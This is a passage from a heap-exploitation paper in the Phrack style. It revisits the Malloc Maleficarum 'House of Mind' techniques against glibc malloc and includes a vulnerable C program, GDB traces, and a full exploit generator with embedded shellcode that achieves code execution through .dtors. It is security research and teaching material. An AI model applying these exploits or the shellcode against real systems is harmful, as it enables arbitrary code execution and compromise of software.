+This one come to declaring in first instance the lacking small
+fault of Phantasmal's article. 
+
+On the other hand, he solved it presenting a proof of concept continued 
+with its correspondent exploit.
+
+Also, K-sPecial's paper was bringing to the light a couple of shades in 
+which Phantasmal had missed in his interpretation of the Houses skills.
+
+Finally, on May 25, 2007, g463 published in Phrack an article called:
+"The use of set_head to defeat the wilderness." [7] g463 described how to
+obtain a "write almost 4 arbitrary bytes to almost anywhere" primitive
+by exploiting an existing bug in the file (1) utility. This is the most
+recent advance in heap overflows.
+
+
+
+              << En todas las actividades es saludable, de vez
+                 en cuando, poner un signo de interrogacion
+                 sobre aquellas cosas que por mucho tiempo se
+                 han dado como seguras. >>
+
+                                          [ Bertrand Russell ]
+
+
+
+           ------------------
+---[ 2 ---[   INTRODUCTION   ]---
+           ------------------
+
+We could to define this paper as "The Practical Guide of the Malloc 
+Maleficarum". And exactly, our main goal is demythologize the majority
+of the methods described in this paper through practical examples (so
+much the vulnerable programs as its associated exploits).
+
+On the other hand, and very importantly, certain mistakes were trying to
+be corrected that were an object of wrong interpretation in Malloc
+Maleficarum. Mistakes that are today more easy to see thanks to the
+enormous work that Phantasmal give us in his moment. He is an adept, a
+"virtual adept" certainly...
+
+It is due to these mistakes that in this article I present new
+contributions to the world of the heap overflow under Linux, introducing
+variations in the skills presented by Phantasmal, and totally new ideas
+that could allow arbitrary code execution by a better way.
+
+In short, you will see in this article:
+
+ - Clean modification of K-sPecial's exploit in The House of Mind.
+ - Implementation renewed of the "fastbin" method in The House of Mind.
+ - Practical implementation of The House of Prime method.
+ - New idea for direct arbitrary code execution in unsorted_chunks()
+   method in The House of Prime.
+ - The House of Spirit practical implementation.
+ - The House of Force practical implementation.
+ - Recapitulation of mistakes in The House of Force theory committed in
+   Malloc Maleficarum.
+ - Theoretical/practical approximation to The House of Lore.
+
+In addition to a general understanding of the implementation of the "Doug
+Lea's malloc" library, I recommend two things:
+
+   1) Read first the article of MaxX [1].
+   2) Download and read the source code of glibc-2.3.6 [8]
+      (malloc.c and arena.c).
+
+  NOTE: Except for The House of Prime, I had used a x86 Linux distro,
+        on a 2.6.24-23 kernel, with glibc version 2.7, which shows
+        that these techniques are still applicable today. Also, I have
+        check that some of them are availables in 2.8.90.
+
+NOTE 2: The current implementation of malloc is known as "ptmalloc",
+        which is an implementation based on the previous "dlmalloc".
+        Ptmalloc was created by Wolfram Gloger. At present, from glibc
+        2.7 to 2.10 are Ptmalloc2 based. You can obtain more information
+        if you visit [9].
+
+As there, it would be desirable to have at your side the Phantasmal's
+theory as support to subsequent methods that will be implemented. However,
+the concepts described in this paper should be sufficient for an almost
+complete understanding of the topic.
+
+In this article you will see, through the witches, as there are still
+some ways to go. And we can go together ...
+
+
+
+                   << Lo que conduce y arrastra
+                      al mundo no son las maquinas,
+                      sino las ideas. >>
+
+                                    [ Victor Hugo ]
+
+
+
+           ------------------------
+---[ 3 ---[   WELCOME TO THE PAST  ]---
+           ------------------------
+
+Why does the "unlink()" technique not apply now?
+
+"unlink ()" assumed that if two chunks were allocated in the heap, and
+second was vulnerable to being overwritten through an overflow of first,
+a third fake chunk could be created and so deceive "free ()" to proceed
+to unlink this second chunk and tie with the first.
+
+Unlink was produced with the following code:
+
+   #define unlink( P, BK, FD ) {            \
+       BK = P->bk;                          \
+       FD = P->fd;                          \
+       FD->bk = BK;                         \
+       BK->fd = FD;                         \
+   }
+
+Being P the second chunk, "P->fd" was changed to point to a memory area
+capable of being overwritten (such as .dtors - 12). If "P->bk" then
+pointed to the address of a Shellcode located at memory for an exploiter
+(at ENV or perhaps the same first chunk), then this address would be
+written in the 3rd step of unlink() code, in "FD->bk". Then:
+
+   "FD->bk" = "P->fd" + 12 = ".dtors".
+   ".dtors" -> &(Shellcode)
+
+In fact, when using DTORS, "P->fd" should point to .dtors+4-12 so that
+"FD->bk" point to DTORS_END, to be executed at finish of application. GOT
+is also a good goal, or a function pointer or more things ...
+
+And here started the fun!
+
+By applying the appropriate patches glibc, the macro "unlink()" is shown
+as follows:
+
+   #define unlink(P, BK, FD) {                                            \
+     FD = P->fd;                                                          \
+     BK = P->bk;                                                          \
+     if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                \
+       malloc_printerr (check_action, "corrupted double-linked list", P); \
+     else {                                                               \
+       FD->bk = BK;                                                       \
+       BK->fd = FD;                                                       \
+     }                                                                    \
+   }
+
+If "P->fd", pointing to the next chunk (FD), is not modified, then the
+"bk" pointer of FD should point to P. The same is true with the previous
+chunk (BK)... if "P->bk" points to the previous chunk, then the forward
+pointer at BK should point to P. In any other case, mean an error in the
+double linked list and thus the second chunk (P) has been hacked.
+
+And here ended the fun!
+
+
+
+                  << Nuestra tecnica no solo produce artefactos,
+                     esto es, cosas que la naturaleza no produce,
+                     sino tambien las cosas mismas que la naturaleza
+                     produce y dotadas de identica actividad
+                     natural. >>
+
+                                                   [ Xavier Zubiri ]
+
+
+
+           ------------------------
+---[ 4 ---[   DES-MALEFICARUM...   ]---
+           ------------------------
+
+Read carefully what now comes. I just hope that at the end of this paper,
+the witches have completely disappeared.
+
+Or... would it be better that they stay?
+
+
+
+             -----------------------
+---[ 4.1 ---[   THE HOUSE OF MIND   ]---
+             -----------------------
+
+We will study "The House of Mind" technique here, step by step, so that
+those who start at these boundaries do not find too many problems along
+the path... a path that already may be a little hard.
+
+Neither show is worth a second view / opinion about how develop the
+exploit, which in my case had a small behavioral variation (we will see it
+below).
+
+The understanding of this technique will become much easier if for some
+accident I can demonstrate the ability of know to show the steps in
+certain order, otherwise the mind go from one side to another, but... test
+and play with the technique.
+
+"The House of Mind" is described as perhaps the easiest method or, at
+least, more friendly with respect to what was "unlink()" in its moment of
+glory.
+
+Two variants will be shown. Let's see here the first one:
+
+NOTE 1: Only one call to "free()" is needed to provoke arbitrary code
+        execution.
+
+NOTE 2: From here, we will have always in mind that "free()" is executed
+        on a second chunk that can be overflowed by another chunk that
+        has been allocated before.
+
+According to "malloc.c," a call to "free()" triggers the execution of a
+wrapper (in the jargon "wrapper functions") called "public_fREe()".
+
+Here the relevant code:
+
+   void
+   public_fREe(Void_t* mem)
+   {
+       mstate ar_ptr;
+       mchunkptr p;        /* chunk corresponding to mem */
+       ...
+       p = mem2chunk(mem);
+       ...
+       ar_ptr = arena_for_chunk(p);
+       ...
+       _int_free(ar_ptr, mem);
+   }
+
+
+A call to "malloc (x)" returns, always that there is still memory
+available, a pointer to the memory area where data can be stored, moved,
+copied, etc.
+
+Imagine for example that:
+
+   "char * ptr = (char *) malloc (512);"
+
+...returns the address "0x0804a008". This address is the "mem" content
+when  "free()" is called.
+
+The "mem2chunk(mem)" function returns a pointer to the start address of
+chunk (not the data, but the beginning of the chunk), which in a allocated
+chunk is set to something like:
+
+   &mem - sizeof(size) - sizeof(prev_size) = &mem - 8.
+
+   p = (0x0804a000);
+
+"p" is send to "arena_for_chunk()". As we can read in "arena.c", it
+trigger the following code:
+
+
+   #define HEAP_MAX_SIZE (1024*1024) /* must be a power of two */
+                    _____________________________________________
+                   |                                             |
+   #define heap_for_ptr(ptr) \                                   |
+      ((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1))) |
+                                                                 |
+   #define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)  |
+  __________________|                         ___________________|
+ |                                           |
+ | #define arena_for_chunk(ptr) \            |
+ |___(chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:&main_arena)
+
+
+As we see, "p" is now "ptr". It is passed "chunk_non_main_arena()"
+which is responsible for checking whether the "size" of this chunk has
+its third least significant bit enabled (NON_MAIN_ARENA = 4h = 100b).
+
+In a unmodified chunk, this function returns "false" and the address of
+"main_arena" will be returned by "arena_for_chunk()". But... fortunately,
+since we can corrupt the "size" field of "p", and enabled NON_MAIN_ARENA
+bit, then we can fool "arena_for_chunk()" to call to "heap_for_ptr().
+
+We are now in:
+
+   (heap_info *) ((unsigned long)(0x0804a000) & ~(HEAP_MAX_SIZE-1)))
+   
+   then:
+
+   (heap_info *) (0x08000000)
+
+We must have in mind that "heap_for_ptr()" is a macro and not a function.
+Then, once more in "arena_for_chunk()" we have:
+
+   (0x08000000)->ar_ptr
+
+"ar_ptr" is the first member of a "heap_info" structure. It is defined
+as you can see:
+
+   typedef struct _heap_info {
+     mstate ar_ptr; /* Arena for this heap. */
+     struct _heap_info *prev; /* Previous heap. */
+     size_t size;   /* Current size in bytes. */
+     size_t pad;    /* Make sure the following data is properly aligned. */
+   } heap_info;
+
+	
+So what you are looking at (0x08000000) the address of an "arena" (it will
+be defined shortly). For now, we can say that at (0x08000000) there isn't
+any address to point to any "arena", so the application soon will break
+with a segmentation fault. (assuming an ET_EXEC with a base of 0x08048000)
+
+It seems that our move end here. As our first chunk is just behind of the
+second chunk at (0x0804a000) (but not much), this only allows us to
+overwrite forward, preventing us write anything at (0x08000000).
+
+But wait a moment... what happens if we can overwrite a chunk with an
+address like this: (0x081002a0)?
+
+If our first chunk was at (0x0804a000), we can overwrite ahead and put in
+(0x08100000) an arbitrary address (usually the begining of the data of our
+first chunk).
+
+Then "heap_for_ptr(ptr)->ar_ptr" take this address, and...
+
+
+ return heap_for_ptr(ptr)->ar_ptr | ret (0x08100000)->ar_ptr = 0x0804a008
+ -------------------------------- | --------------------------------------
+ ar_ptr = arena_for_chunk(p);     | ar_ptr = 0x0804a008
+ ...                              |
+ _int_free(ar_ptr, mem);          | _int_free(0x0804a008, 0x081002a0);
+
+
+Think that we can change "ar_ptr" to any value. For example, we can do
+that it points to an environment variable or another place. At this
+address of memory, "_int_free()" expects to find an "arena" structure.
+
+Let's see now ...
+
+    mstate ar_ptr;
+
+"mstate" is actually a real "malloc_state" structure (no comments):
+
+   struct malloc_state {
+     mutex_t mutex;
+     INTERNAL_SIZE_T  max_fast;   /* low 2 bits used as flags */
+     mfastbinptr      fastbins[NFASTBINS];
+     mchunkptr        top;
+     mchunkptr        last_remainder;
+     mchunkptr        bins[NBINS * 2];
+     unsigned int     binmap[BINMAPSIZE];
+     ...
+     INTERNAL_SIZE_T system_mem;
+     INTERNAL_SIZE_T max_system_mem;
+   };
+   ...
+   static struct malloc_state main_arena;
+
+Soon it will be helpful to know this. The goal of The House of Mind is to
+ensure that the unsorted_chunks() code is reaached in "_int_free ()":
+
+   void _int_free(mstate av, Void_t* mem) {
+      .....
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      p->bk = bck;
+      p->fd = fwd;
+      bck->fd = p;
+      fwd->bk = p;
+      .....
+   }
+
+This is already beginning to look a bit more to "unlink()".
+
+Now "av" is the value of "ar_ptr" which is supposed to be the beginning
+of an "arena". More... "unsorted_chunks ()," according to Phantasmal
+Phantasmagoria, return the value of "av->bins[0]". If "av" is (0x0804a008)
+(the start of our buffer), and we can write forward, we can control the
+value of bins[0], once past fields: mutex, max_fast, fastbins[] and top.
+This is simple ...
+
+Phantasmal showed us that if we put in av->bins[0] the address of ".dtors"
+minus 8, then, the penultimate sentence write in this  address plus 8, the
+address of the overflow "p". In this address is the "prev_size" field and
+there can place any thing, such as a "JMP", then we can jump to shellcode
+located a little later and you know as follows ...
+
+   p = 0x081002a0 - 8;
+   ...
+   bck = .dtors + 4 - 8
+   ...
+   bck + 8 = DTORS_END = 0x08100298
+
+   1st Bit     -bins[0]-                     2nd Bit
+   [ .......... .dtors+4-8 ] [0x0804a008 ... ] [jmp 0xc ...... (Shellcode)] 
+   |                         |                 |
+   0x0804a008                0x08100000        0x08100298
+
+When application finishes running DTORS, therefore the jump is executed,
+and our Shellcode.
+
+Although the idea was good, K-special warned us that "unsorted_chunks ()",
+in fact, did not return the value of "av->bins[0]," but it returns its
+address "&".
+
+Let's take a look:
+
+   #define bin_at(m, i) ((mbinptr)((char*)&((m)->bins[(i)<<1]) - 
+                                                (SIZE_SZ<<1)))
+   ...
+   #define unsorted_chunks(M)          (bin_at(M, 1))
+
+Indeed, we see that "bin_at()" returns the address and not the value.
+Therefore another way must be taken. Bearing this in mind, we can do
+the next:
+
+   bck = &av->bins[0];                     /* Address of ...   */
+   fwd = bck->fd = *(&av->bins[0] + 8);    /* The value of ... */
+   fwd->bk = *(&av->bins[0] + 8) + 12 = p;
+
+	
+Which means that if we control the value located in:
+"&av->bins[0] + 8" and we put there ".dtors + 4 - 12", that will be
+placed in "fwd". In the last sentence it'll be written into DTORS_END
+the address of the second chunk "p", and continue as above.
+
+But we have jumped here without crossing the road full of spines. Our
+friend Phantasmal also warned us that to run this piece of code, certain
+conditions should be met. Now we will see each of them related with its
+corresponding portion of code in the "_int_free()".
+
+   1) The negative value of the overwritten chunk must
+      be less than the value of this chunk "p".
+
+      if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0) ...
+
+      PLEASE NOTE: This must be a misinterpretation of language. To jump
+                   this integrity check: "-size" must be "greater" than
+                   the value of "p".
+
+   2) The size of the chunk must not be less than or equal to
+      av->max_fast.
+
+      if ((unsigned long)(size) <= (unsigned long)(av->max_fast) ...
+
+      We control the size of the overflow chunk so as "av->max_fast"
+      which is the second field of our "fakearena".
+
+   3) The bit IS_MMAPPED must not be set into the "size" field.
+
+      else if (!chunk_is_mmapped(p)) { ...
+
+      Also, we control the second least significant bit of the "size".
+
+   4) The overwrited chunk can not be av->top (Wilderness chunk).
+
+      if (__builtin_expect (p == av->top, 0)) ...
+
+   5) The NONCONTIGUOUS_BIT of av->max_fast must be set.
+
+      if (__builtin_expect (contiguous (av) ...
+
+   Designer controls "av->max_fast" and know that NONCONTIGUOUS_BIT
+   is "0x02" = "10b".
+
+   6) The PREV_INUSE bit of the next chunk must be set.
+
+      if (__builtin_expect (!prev_inuse(nextchunk), 0)) ...
+
+      This is the default in an allocated chunk.
+
+   7) The size of nextchunk must be greater than 8.
+
+      if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0) ...
+
+   8) The size of nextchunk must be less than av->system_mem
+
+      ... __builtin_expect (nextsize >= av->system_mem, 0)) ...
+
+   9) The PREV_INUSE bit of the chunk must not be set.
+
+      /* consolidate backward */
+      if (!prev_inuse(p)) { ...
+
+      ATTENTION: Phantasmal seems wrong here, at least according to my
+                 opinion, the PREV_INUSE bit of overwritten chunk, must
+                 be set in order to bypass this check and not unlink the
+                 previous chunk.
+
+  10) The nextchunk cannot equal av->top.
+
+      if (nextchunk != av->top) { ...
+
+      If we alter all the information from "av->fastbins[]" to
+      "av->bins[0]", then "av->top" will be overwritten and will
+      be almost impossible to be equal to "nextchunk".
+
+  11) The PREV_INUSE bit of the chunk after nextchunk
+      (nextchunk + nextsize) must be set.
+
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+      /* consolidate forward */
+      if (!nextinuse) { ...
+
+The path seems long and tortuous, but it is not so much when we control
+most situations. Let's go to see the vulnerable program of our friend
+K-sPecial:
+
+[-----]
+
+/*
+ * K-sPecial's vulnerable program
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+int main (void) {
+   char *ptr  = malloc(1024);        /* First allocated chunk */
+   char *ptr2;                       /* Second chunk          */
+   /* ptr & ~(HEAP_MAX_SIZE-1) = 0x08000000 */
+   int heap = (int)ptr & 0xFFF00000;
+   _Bool found = 0;
+
+   printf("ptr found at %p\n", ptr);  /* Print address of first chunk */
+
+   // i == 2 because this is my second chunk to allocate
+   for (int i = 2; i < 1024; i++) {
+     /* Allocate chunks up to 0x08100000 */
+     if (!found && (((int)(ptr2 = malloc(1024)) & 0xFFF00000) == \
+                                           (heap + 0x100000))) {
+       printf("good heap allignment found on malloc() %i (%p)\n", i, ptr2);
+          found = 1; /* Go out */
+          break;
+       }
+
+   }
+        malloc(1024); /* Request another chunk: (ptr2 != av->top) */
+        /* Incorrect input: 1048576 bytes */
+        fread (ptr, 1024 * 1024, 1, stdin); 
+
+        free(ptr);   /* Free first chunk  */
+        free(ptr2);  /* The House of Mind */
+        return(0);   /* Bye */
+}
+
+[-----]
+
+Note that the input allows NULL bytes without ending our string. This
+makes our task more easy.
+
+The K-sPecial's exploit create the following string:
+
+[-----]
+
+ 0x0804a008
+ |
+ [Ax8][0h x 4][201h x 8][DTORS_END-12 x 246][(409h-Ax1028) x 721][409h] ...
+              |                   |
+              av->max_fast        bins[0]      size
+                                               |
+ .... [(&1st chunk + 8) x 256][NOPx2-JUMP 0x0c][40Dh][NOPx8][SHELLCODE]
+              |               |                      |
+              0x08100000      prev_size (0x08100298) *mem (0x081002a0)
+
+[-----]
+
+1)  The first call to free() overwrites the first 8 bytes with garbage,
+    then K-special prefer to skip this area and put into (0x08100000)
+    the address of the first chunk + 8(data area) + 8 (0x0804a010).
+    Here begins the fake arena structure.
+
+2)  Then comes "\x00\x00\x00\x00" that fills the "av->mutex" field.
+    Other value will cause that the exploit to fail.
+
+3)  "av->max_fast" get the value "102h". This satisfies the conditions
+    2 and 5:
+
+    (2) (size > max_fast) -> (40Dh > 102h)
+    (5) "\x02" NONCONTIGUOUS_BIT is set
+
+4)  Complete the first chunk with the DTORS_END (.dtors+4) address
+    minus 8. This will overwrite &av->bins[0] + 8.
+
+5)  Fill the nexts chunks until (0x08100000) with characters "A", while
+    retaining the "size" field (409h) of each chunk. Each one has
+    PREV_INUSE bit properly set.
+
+6)  To reach the address of the overwritten chunk "p", we fill with
+    the address where we will find our "fakearena", which is the
+    address of the first chunk plus 8. The goal is jump garbage bytes
+    that will be overwritten. 
+
+7)  The "prev_size" field of "p" must be "nop; nop; jmp 0x0c;". It will
+    jump to our Shellcode when DTORS_END will be executed at the end of
+    the application.
+
+8)  The "size" field of "p" must be greater than the value written in
+    "av->max_fast" and also have the NON_MAIN_ARENA bit activated
+    which was the trigger for this whole story in The House of Mind.
+
+9)  A few NOPS and then our Shellcode.
+
+After understanding some very solid ideas, I was really surprised when a
+simple execution of the K-sPecial's exploit produced the following output:
+
+blackngel@linux:~$ ./exploit > file
+blackngel@linux:~$ ./heap1 < file
+ptr found at 0x804a008
+good heap allignment found on malloc() 724 (0x81002a0)
+*** glibc detected *** ./heap1: double free or corruption (out): 0x081002a0
+...
+
+In "malloc.c" this error corresponds to the integrity check:
+
+   if (__builtin_expect (contiguous (av)
+
+Let's go to see what happens with GDB:
+
+[-----]
+
+blackngel@linux:~$ gdb -q ./heap1
+(gdb) disass main
+Dump of assembler code for function main:
+.....
+.....
+0x08048513 <main+223>:	call   0x804836c <free@plt>
+0x08048518 <main+228>:	mov    -0x10(%ebp),%eax
+0x0804851b <main+231>:	mov    %eax,(%esp)
+0x0804851e <main+234>:	call   0x804836c <free@plt>
+0x08048523 <main+239>:	mov    $0x0,%eax
+0x08048528 <main+244>:	add    $0x34,%esp
+0x0804852b <main+247>:	pop    %ecx
+0x0804852c <main+248>:	pop    %ebp
+0x0804852d <main+249>:	lea    -0x4(%ecx),%esp
+0x08048530 <main+252>:	ret    
+End of assembler dump.
+(gdb) break *main+223             /* Before first call to free() */
+Breakpoint 1 at 0x8048513
+(gdb) break *main+228             /* After first call to free()  */
+Breakpoint 2 at 0x8048518
+(gdb) run < file
+Starting program: /home/blackngel/heap1 < file
+ptr found at 0x804a008
+good heap allignment found on malloc() 724 (0x81002a0)
+
+Breakpoint 1, 0x08048513 in main ()
+Current language:  auto; currently asm
+(gdb) x/16x 0x0804a008
+0x804a008:	0x41414141	0x41414141	0x00000000	0x00000102
+0x804a018:	0x00000102	0x00000102	0x00000102	0x00000102
+0x804a028:	0x00000102	0x00000102	0x00000102	0x08049648
+0x804a038:	0x08049648	0x08049648	0x08049648	0x08049648
+(gdb) c
+Continuing.
+
+Breakpoint 2, 0x08048518 in main ()
+(gdb) x/16x 0x0804a008
+0x804a008:	0xb7fb2190	0xb7fb2190	0x00000000	0x00000000
+0x804a018:	0x00000102	0x00000102	0x00000102	0x00000102
+0x804a028:	0x00000102	0x00000102	0x00000102	0x08049648
+0x804a038:	0x08049648	0x08049648	0x08049648	0x08049648
+
+[-----]
+
+When the application stopped before the first free(), we can see our
+buffer seems to be well formed: [A x 8] [0000] [102h x 8].
+
+But once the first call to free () is completed, as we said, the first 8
+bytes are trashed with memory addresses. Most surprising is that the
+memory 0x0804a0010(av) + 4, is set to zero (0x00000000).
+
+This position should be "av->max_fast", which being zero and not having
+NONCONTIGUOUS_BIT bit enabled, dumps the error above. This seems happens
+with the following instructions:
+
+   # define mutex_unlock(m)            (*(m) = 0)
+
+... that is executed to the end of "_int_free()" with:
+
+   (void *)mutex_unlock(&ar_ptr->mutex);
+
+Anyway, if someone puts a 0 for us. What happens if we do that ar_ptr
+points to 0x0804a014?
+
+(gdb) x/16x 0x0804a014
+                // Mutex       // max_fast ?
+0x804a014:	0x00000000	0x00000102	0x00000102	0x00000102
+0x804a024:	0x00000102	0x00000102	0x00000102	0x00000102
+0x804a034:	0x08049648	0x08049648	0x08049648	0x08049648
+0x804a044:	0x08049648	0x08049648	0x08049648	0x08049648
+
+So we can save 8 bytes of garbage in the exploit and the hardcoded value
+of "mutex", and leave to free () to do the rest for us.
+
+[-----]
+
+blackngel@mac:~$ gdb -q ./heap1
+(gdb) run < file
+Starting program: /home/blackngel/heap1 < file
+ptr found at 0x804a008
+good heap allignment found on malloc() 724 (0x81002a0)
+
+Program received signal SIGSEGV, Segmentation fault.
+0x081002b2 in ?? ()
+(gdb) x/16x 0x08100298
+0x8100298:	0x90900ceb	0x00000409	0x08049648	0x0804a044
+0x81002a8:	0x00000000	0x00000000	0x5bf42474	0x5e137381
+0x81002b8:	0x83426ac9	0xf4e2fceb	0xdb32c234	0x6f02af0c
+0x81002c8:	0x2a8d403d	0x4202ba71	0x2b08e636	0x10894030
+(gdb) 
+
+[-----]
+
+It seems that the second chunk "p", again suffer the wrath of free().
+PREV_SIZE field is OK, SIZE field is OK, but the 8 NOPS are trashed with
+two memory addresses and 8 bytes NULL.
+
+Note that after the call to "unsorted_chunks()", we have two sentences
+like these:
+
+      p->bk = bck;
+      p->fd = fwd;
+	
+It is clear that both pointers are overwritten with the address of the
+previous and next chunks to our overflowed chunk "p".
+
+What happens if we place 16 NOPS?
+
+[-----]
+/*
+ * K-sPecial exploit modified by blackngel
+ */
+
+#include <stdio.h>
+
+/* linux_ia32_exec -  CMD=/usr/bin/id Size=72 Encoder=PexFnstenvSub
+http://metasploit.com */
+unsigned char scode[] =
+"\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
+"\xc9\x6a\x42\x83\xeb\xfc\xe2\xf4\x34\xc2\x32\xdb\x0c\xaf\x02\x6f"
+"\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10"
+"\xb6\xc5\x6a\x42\x5e\xe6\x1f\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26"
+"\x5e\x9e\x39\xcb\xbf\x04\xea\x42";
+
+int main (void) {
+
+     int i, j;
+
+   for (i = 0; i < 44 / 4; i++)
+          fwrite("\x02\x01\x00\x00", 4, 1, stdout); /* av->max_fast-12 */
+
+   for (i = 0; i < 984 / 4; i++)
+          fwrite("\x48\x96\x04\x08", 4, 1, stdout); /* DTORS_END - 8   */
+
+   for (i = 0; i < 721; i++) {
+          fwrite("\x09\x04\x00\x00", 4, 1, stdout); /* PRESERVE SIZE   */
+          for (j = 0; j < 1028; j++)
+                  putchar(0x41);                    /* PADDING         */
+   }
+   fwrite("\x09\x04\x00\x00", 4, 1, stdout);
+
+   for (i = 0; i < (1024 / 4); i++)
+          fwrite("\x14\xa0\x04\x08", 4, 1, stdout);
+
+   fwrite("\xeb\x0c\x90\x90", 4, 1, stdout); /* prev_size -> jump 0x0c */
+
+   fwrite("\x0d\x04\x00\x00", 4, 1, stdout); /* size -> NON_MAIN_ARENA */
+
+   fwrite("\x90\x90\x90\x90\x90\x90\x90\x90" \
+          "\x90\x90\x90\x90\x90\x90\x90\x90", 16, 1, stdout);  /* NOPS */
+
+   fwrite(scode, sizeof(scode), 1, stdout); /* SHELLCODE */
+
+   return 0;
+}
+
+[-----]
+
+blackngel@linux:~$ ./exploit > file
+blackngel@linux:~$ ./heap1 < file
+ptr found at 0x804a008
+good heap allignment found on malloc() 724 (0x81002a0)
+uid=1000(blackngel) gid=1000(blackngel) groups=4(adm),20(dialout),
+24(cdrom),25(floppy),29(audio),30(dip),33(www-data),44(video),
+46(plugdev),104(scanner),108(lpadmin),110(admin),115(netdev),
+117(powerdev),1000(blackngel),1001(compiler)
+blackngel@linux:~$ 
+
+We have succeeded! Up to this point, you could think that the first of
+conditions for The House of Mind (a piece of memory allocated in an
+address like 0x08100000) seems impossible from a practical point of view.
+
+But this must be considered again for two reasons:
+
+   1) You can to allocate a big amount of memory.
+   2) The user can control this amount.
+
+Is that true?
+
+Well, yes, if we go back in time. Even at the same vulnerability in
+is_modified() function of CVS. We can see the function corresponding to
+the command "entry" of that service:
+
+[-----]
+
+ static void serve_entry (arg)
+       char *arg;
+ {
+     struct an_entry *p; char *cp;
+
+     [...]
+     cp = arg;
+     [...]
+     p = xmalloc (sizeof (struct an_entry));
+     cp = xmalloc (strlen (arg) + 2); strcpy (cp, arg); p->next = entries;
+     p->entry = cp;
+     entries = p;
+ }
+
+[-----]
+
+How vl4d1m1r said, the heap layout will looked something like this:
+
+   [an_entry][buffer][an_entry][buffer]...[Wilderness]
+
+These chunks will not be free()ed until the function
+server_write_entries() is called with the "noop" command. Note that in
+addition to controlling the number of allocated chunks, you can control
+the length too.
+
+You can find this theory much better explained in the article "The Art of
+Exploitation: Come on back to exploit [10] published by vl4d1m1r of
+Ac1dB1tch3z in Phrack 64.
+
+The old exploit used the technique unlink () to accomplish its purpose.
+This was for the glibc versions where this feature was not yet patched.
+
+I'm not saying that The House of Mind is applicable to this vulnerability,
+but rather that meets certain conditions. It would be an exercise for the
+more advanced reader.
+
+I have checked this House in a Linux distro with GLIBC 2.8.90.
+
+We arrived, after a long journey, to The House of Mind.
+
+
+
+                  << Si el unico instrumento de que se
+                     dispone es un martillo, todo acaba
+                     pareciendo un clavo. >>
+
+                                        [ Lotfi Zadeh ]
+
+
+
+               --------------------
+---[ 4.1.1 ---[   FASTBIN METHOD   ]---
+               --------------------
+
+As a new technique, I established in this paper a practical solution to
+"Fastbin method" in The House of Mind, which was only exposed of
+theoretical mode in the papers of Phantasmal and K-sPecial, and also
+contained certain elements which were wrongly interpreted.
+
+Both, K-special and Phantasmal said practically the same in their
+documents about this method. The basic idea was to trigger following code:
+
+[-----]
+
+  if ((unsigned long)(size) <= (unsigned long)(av->max_fast)) {
+   if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (fast)";
+	goto errout;
+      }
+
+    set_fastchunks(av);
+    fb = &(av->fastbins[fastbin_index(size)]);
+    if (__builtin_expect (*fb == p, 0))
+      {
+	errstr = "double free or corruption (fasttop)";
+	goto errout;
+      }
+    printf("\nbDebug: p = 0x%x - fb = 0x%x\n", p, fb);
+    p->fd = *fb;
+    *fb = p;
+  }
+
+[-----]
+	
+As this code is located after the first integrity check in "_int_free()",
+the main advantage is that we should not worry about the following tests. 
+This may appear to be a task easier than previous method, but in reality
+it is not.
+
+The core of this technique is in place "fb" to the address of an entry of
+".dtors" or "GOT". Thanks to "The House of Prime" (first house discussed
+in Malloc Maleficarum), we know how to accomplish this.
+
+If we hack the "size" field of the overflowed chunk passed to free() and
+sets it to 8, "fastbin_index()" returned the following value:
+
+   #define fastbin_index(sz) ((((unsigned int)(sz)) >> 3) - 2)
+
+   (8 >> 3) - 2 = -1
+
+Then:
+
+   &(av->fastbins[-1])
+
+And as in an arena structure (malloc_state) the previous item to
+fastbins[] matrix is "av->maxfast" (they are contiguous), the address
+where is this value will be placed in "fb".
+
+In "*fb = p", the content of this address will be overwritten with the
+address of the liberated chunk "p", which as before should must contain
+a "JMP" sentence to reach the Shellcode.
+
+Seen this, if you want to use ".dtors", you should make that "ar_ptr"
+points to ".dtors" address in "public_free()", so that this address will
+be the fakearena and "av->max_fast (av + 4)" will be equal to ".dtors +
+4".  Then it will be overwritten with the address of "p".
+
+But to achieve this you have to go through a hard path. Let's see the
+conditions that we must meet:
+
+   1) The size of chunk must be less than "av->maxfast":
+
+   if ((unsigned long)(size) <= (unsigned long)(av->max_fast))
+
+   This is relatively the easiest, because we said that the size will be
+   equal to "8" and "av->max_fast" will be the address of a destructor.
+   It should be clear that in this case "DTORS_END" is not valid because
+   it is always "\x00\x00\x00\x00" and never will be greater than "size".
+   It seems then that the most effective is to make use of the Global
+   Offset Table (GOT).
+
+   We must be aware that we say that "size" must be 8, but in order to
+   modify "ar_ptr", as in the previous technique, then NON_MAIN_ARENA bit
+   (third least significant bit) must be set. So, I think, "size" should
+   actually be:
+
+      8 = 1000b | 100b = 4 | 8 + NON_MAIN_ARENA = 12 = [0x0c]
+
+      With PREV_INUSE bit set: 1101b = [0x0d] 
+
+
+   2) The size of contiguous chunk (next chunk) to "p" must be greater
+      than "8":
+
+   __builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+
+   This is no problem, right?
+
+   3) The same chunk, at time, must be less than "av->system_mem":
+
+   __builtin_expect (chunksize (chunk_at_offset (p, size)) >= av->system_mem, 0)
+
+	
+   This is perhaps the most complicated step. Once established ar_ptr(av)
+   in ".dtors" or "GOT", the "system_mem" item in "malloc_state" structure
+   is beyond 1848 bytes.
+
+   GOT is almost contiguous to DTORS. In small applications the GOT table
+   also is relatively small. For this reason it is normal to find in the
+   av->system_mem position a lot of zero bytes. Let's see:
+
+   [-----]
+
+   blackngel@linux:~$ objdump -s -j .dtors ./heap1
+   ...
+   Contents of section .dtors:
